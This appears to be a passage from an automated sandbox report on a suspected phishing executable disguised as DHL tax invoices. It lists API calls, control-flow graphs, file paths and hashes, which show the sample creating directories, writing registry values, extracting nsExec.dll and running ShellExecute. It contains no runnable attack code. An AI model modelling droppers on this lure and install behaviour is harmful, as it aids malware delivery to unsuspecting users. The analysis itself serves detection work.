                                                            control_flow_graph 770 4031ef-403217 GetTickCount 771 403347-40334f call 402d9f 770->771 772 40321d-403248 call 40336e SetFilePointer 770->772 777 403351-403355 771->777 778 40324d-40325f 772->778 779 403261 778->779 780 403263-403271 call 403358 778->780 779->780 783 403277-403283 780->783 784 403339-40333c 780->784 785 403289-40328f 783->785 784->777 786 403291-403297 785->786 787 4032ba-4032d6 call 406697 785->787 786->787 788 403299-4032b9 call 402d9f 786->788 793 403342 787->793 794 4032d8-4032e0 787->794 788->787 795 403344-403345 793->795 796 4032e2-4032ea call 405e05 794->796 797 403303-403309 794->797 795->777 801 4032ef-4032f1 796->801 797->793 798 40330b-40330d 797->798 798->793 800 40330f-403322 798->800 800->778 802 403328-403337 SetFilePointer 800->802 803 4032f3-4032ff 801->803 804 40333e-403340 801->804 802->771 803->785 805 403301 803->805 804->795 805->800
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00403203
                                                              • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 00403236
                                                            • SetFilePointer.KERNELBASE(0023A243,00000000,00000000,00414ED0,00004000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000), ref: 00403331
                                                            Similarity
                                                            • API ID: FilePointer$CountTick
                                                            • String ID: G A
                                                            • API String ID: 1092082344-516626419
                                                            • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                            • Instruction ID: 2fd669d0756999c0d63da40b5d988076205959dac08f3783f289fe1fafb1afdd
                                                            • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                            • Instruction Fuzzy Hash: 19314B72500204DBD710DF69EEC49663FA9F74075A718423FE900F22E0CBB55D458B9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 806 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 813 4023c7-4023cf 806->813 814 402a4c-402a5b 806->814 815 4023d1-4023de call 402bbf lstrlenW 813->815 816 4023e2-4023e5 813->816 815->816 818 4023f5-4023f8 816->818 819 4023e7-4023f4 call 402ba2 816->819 824 402409-40241d RegSetValueExW 818->824 825 4023fa-402404 call 4030e7 818->825 819->818 828 402422-4024fc RegCloseKey 824->828 829 40241f 824->829 825->824 828->814 829->828
                                                            APIs
                                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                            • lstrlenW.KERNEL32(0040B5D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Similarity
                                                            • API ID: CloseCreateValuelstrlen
                                                            • String ID:
                                                            • API String ID: 1356686001-0
                                                            • Opcode ID: f0e2339e940dc33c402bc398b4ebf085dfa1ba78c2790fe29b119279f0c59b8a
                                                            • Instruction ID: d84b147cfae213de6894e87518a1957a70c03431d85ade02b305fde94438308f
                                                            • Opcode Fuzzy Hash: f0e2339e940dc33c402bc398b4ebf085dfa1ba78c2790fe29b119279f0c59b8a
                                                            • Instruction Fuzzy Hash: E511C071E00108BFEB10AFA4DE89DAE777DEB14358F11403AF904B71D1DBB85E409668
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0,00000000), ref: 00405BEB
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                              • Part of subcall function 004057AC: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\releve,?,00000000,000000F0), ref: 00401645
                                                            Strings
                                                            • C:\Users\user\AppData\Local\releve, xrefs: 00401638
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Local\releve
                                                            • API String ID: 1892508949-2510609794
                                                            • Opcode ID: d84c169ce5b3ecf09dc814364db80869bc74cebb640b1dc805c577dbb1d601e2
                                                            • Instruction ID: 18abe7de9e9977a76830232601504265d2e6edcedfe07fce7f69d5744a4425eb
                                                            • Opcode Fuzzy Hash: d84c169ce5b3ecf09dc814364db80869bc74cebb640b1dc805c577dbb1d601e2
                                                            • Instruction Fuzzy Hash: F911E631500504EBCF207FA0CD0199E3AB2EF44364B25453BF906B61F2DA3D4A819E5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                            • Instruction ID: 95c87b37ce546c92696c349aad8761a6baa0f42cb897a758cf539d426e2a5a70
                                                            • Opcode Fuzzy Hash: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                            • Instruction Fuzzy Hash: 65A13471D00229CBDF28CFA8C844AADBBB1FF44305F15816AD956BB281D7785A86DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                            • Instruction ID: dd225a6952a4a1885b566de7f95e3528e0c965b1b64db9b9769652e5c735704b
                                                            • Opcode Fuzzy Hash: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                            • Instruction Fuzzy Hash: 3D913370D04229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB291C7789A86DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                            • Instruction ID: c728d5504c89e28601c55753f21d2f559f3974f1a6ce44cf054f885a45476dee
                                                            • Opcode Fuzzy Hash: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                            • Instruction Fuzzy Hash: 06813471D04228CFDF24CFA8C844BADBBB1FB44305F25816AD856BB291C7789A86DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                            • Instruction ID: 5389f57cfb4a3ea8b0a271fe5c21418892ef356aef38e154ca47b5156c43700c
                                                            • Opcode Fuzzy Hash: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                            • Instruction Fuzzy Hash: 37816831D04229CBDF24CFA8C844BADBBB0FF44305F11816AD956BB281D7785986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                            • Instruction ID: 7cecadd07089ef5f508d2048bcf4206a214b5fe31ba49bd0cdf53ec9cfb3ce0b
                                                            • Opcode Fuzzy Hash: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                            • Instruction Fuzzy Hash: 35712175D04228CBDF28CFA8C844BADBBB1FB44305F15816AD806BB281D7789A96DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                            • Instruction ID: f96eec566abe8136b7696836c8602221009d3abbc3cba5cf828ad5cd02611e0d
                                                            • Opcode Fuzzy Hash: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                            • Instruction Fuzzy Hash: 56713371D04228CBEF28CFA8C844BADBBB1FF44305F15816AD856BB281C7789996DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                            • Instruction ID: 17f295adf0ba2181094cfffbed918b39bb4908eb68d6975640ddb9889f0749db
                                                            • Opcode Fuzzy Hash: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                            • Instruction Fuzzy Hash: F2714531D04229CBEF28CF98C844BADBBB1FF44305F11816AD816BB291C7785A96DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                              • Part of subcall function 004052DD: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                              • Part of subcall function 004052DD: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 334405425-0
                                                            • Opcode ID: 69146f7a4753ed4937f5c766683e27070a7d5aca3c441f82957c5ca1d2fa2486
                                                            • Instruction ID: 135227bab5bbd0cb957ad13063370cb04025123e1843093ab7a3381522db9c00
                                                            • Opcode Fuzzy Hash: 69146f7a4753ed4937f5c766683e27070a7d5aca3c441f82957c5ca1d2fa2486
                                                            • Instruction Fuzzy Hash: 7D21A731900219EBCF20AFA5CE48A9E7E71BF00354F20427BF511B51E1DBBD8A81DA5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Enum$CloseOpenValue
                                                            • String ID:
                                                            • API String ID: 167947723-0
                                                            • Opcode ID: 8e5f1f37d42505646bf45595fe3bc72829f9a9c39478d6518455921b480dc65b
                                                            • Instruction ID: c7ec42ec2a5b8cbcf97019b844e04a4f9c539befeef3331d530b96059407f5ff
                                                            • Opcode Fuzzy Hash: 8e5f1f37d42505646bf45595fe3bc72829f9a9c39478d6518455921b480dc65b
                                                            • Instruction Fuzzy Hash: FCF03171A14204EBEB209F65DE8CABF767DEF80354B10843FF505B61D0DAB84D419B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\releve,?), ref: 00401E52
                                                            Strings
                                                            • C:\Users\user\AppData\Local\releve, xrefs: 00401E3B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: ExecuteShell
                                                            • String ID: C:\Users\user\AppData\Local\releve
                                                            • API String ID: 587946157-2510609794
                                                            • Opcode ID: b293fc5002a9e8d58ec67e345afa483c654a36284cedd74e9b44580f0845c611
                                                            • Instruction ID: 7aca97ec9270bcac2266565e3bd1718053f2078ff1e9e7461c7936a93ee42730
                                                            • Opcode Fuzzy Hash: b293fc5002a9e8d58ec67e345afa483c654a36284cedd74e9b44580f0845c611
                                                            • Instruction Fuzzy Hash: 79F0C236B00100ABCB11AFB99D4AEAD33B9AB40724B244577F801F70D5DAFCC9419628
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 0040310C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                            • Instruction ID: 040f2acbe5348ef8c996952313d322865bd2faa87b76d8d9ba7109e69b0e4b3d
                                                            • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                            • Instruction Fuzzy Hash: 22316B30200219EBDB108F55ED84ADA3F68EB08359F20813AF905EA1D0DB79DF50DBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: 799035c5252feedebfb4d06e0759c3dcc48cc576c1d476db2c73a9b72486c9d3
                                                            • Instruction ID: a4ed2935f8c713a64b441f8b02302a8faa8aa65f3841d01997d269d515fb9b23
                                                            • Opcode Fuzzy Hash: 799035c5252feedebfb4d06e0759c3dcc48cc576c1d476db2c73a9b72486c9d3
                                                            • Instruction Fuzzy Hash: 9D119131911205EBDB10CFA0CA489AEB7B4EF44354B20843FE446B72D0D6B85A41DB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                            • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                            • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                            • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 004053C0
                                                              • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 0040540C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
                                                            • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                            • Instruction ID: fd15c1a48ffcd0bde852b119af7687a848e5b357f1d71b2c4b4b2b4c4c2fcb19
                                                            • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                            • Instruction Fuzzy Hash: 55F0F076645601CBD3101B54AD05B5B7268EF80781F56407EEE44A23F1CABA48428B2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                              • Part of subcall function 004064E8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                              • Part of subcall function 004064E8: wsprintfW.USER32 ref: 0040653A
                                                              • Part of subcall function 004064E8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                            • Instruction ID: 8c1a5bb66f910ccc430fc34c4425cef617f316e2833151c7c1ff8c8a0ee84b40
                                                            • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                            • Instruction Fuzzy Hash: C3E086326042206BD6105B706E0893762BC9ED8740302483EF946F2084D778DC329A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405D57
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                            • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                            • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                            • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                            • Instruction ID: 62c1218995ad43f24aa052634507c0d83541fa9dca801c4eab67991220ff17ac
                                                            • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                            • Instruction Fuzzy Hash: 40D01272504520AFC2513738EF0C89BBF95EB543B17028B35FAF9A22F0DB304C568A98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040582F
                                                            • GetLastError.KERNEL32 ref: 0040583D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                            • Instruction ID: d963a2520b22da8993c1f0374a54a6368e12bf2bf52e26206a68f99a8800bbf8
                                                            • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                            • Instruction Fuzzy Hash: 1DC04C31204B029AD7506B609F097177954AB50781F11C8396946E00A0DE348465DE2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00412047,0040CED0,004032EF,0040CED0,00412047,00414ED0,00004000,?,00000000,00403119,00000004), ref: 00405E19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                            • Instruction ID: dac0b8971ba2920abb5474f128329a0fa477ab7403896bbfc0984bb8014ca22f
                                                            • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                            • Instruction Fuzzy Hash: 4AE08632100119ABCF105F50DC00EEB376CEB00350F004832FA65E2040E230EA219BE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
